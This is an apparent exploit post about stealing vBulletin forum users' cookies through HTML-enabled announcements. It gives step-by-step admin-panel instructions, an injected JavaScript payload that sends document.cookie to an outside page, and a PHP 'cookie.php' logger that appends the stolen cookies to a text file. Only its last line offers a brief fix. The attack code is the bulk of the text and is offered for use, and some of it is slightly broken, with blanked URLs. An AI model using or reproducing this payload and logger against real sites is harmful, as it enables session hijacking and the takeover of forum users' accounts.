Skip to main content

vBulletin Announcements Cookie Steal Vulnerability

vBulletin Announcements, by default has html enabled, so if you get access to a forum using other exploits and get a user with acp info, but it only has default admin cp permissions (moderator access and announcements), you can inject a cookie stealer and steal other users informations.
admincp>announcements>create a new one>put some random announcemnt + this code:

<script language="JavaScript">
document.location= "" + document.cookie; </script>

and in your site put this and name it cookie.php

$cookie = $HTTP_GET_VARS[" p"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='';</script>";

If you're the owner, a "fix" for this is disallow html in announcements.
# [2012-12-16]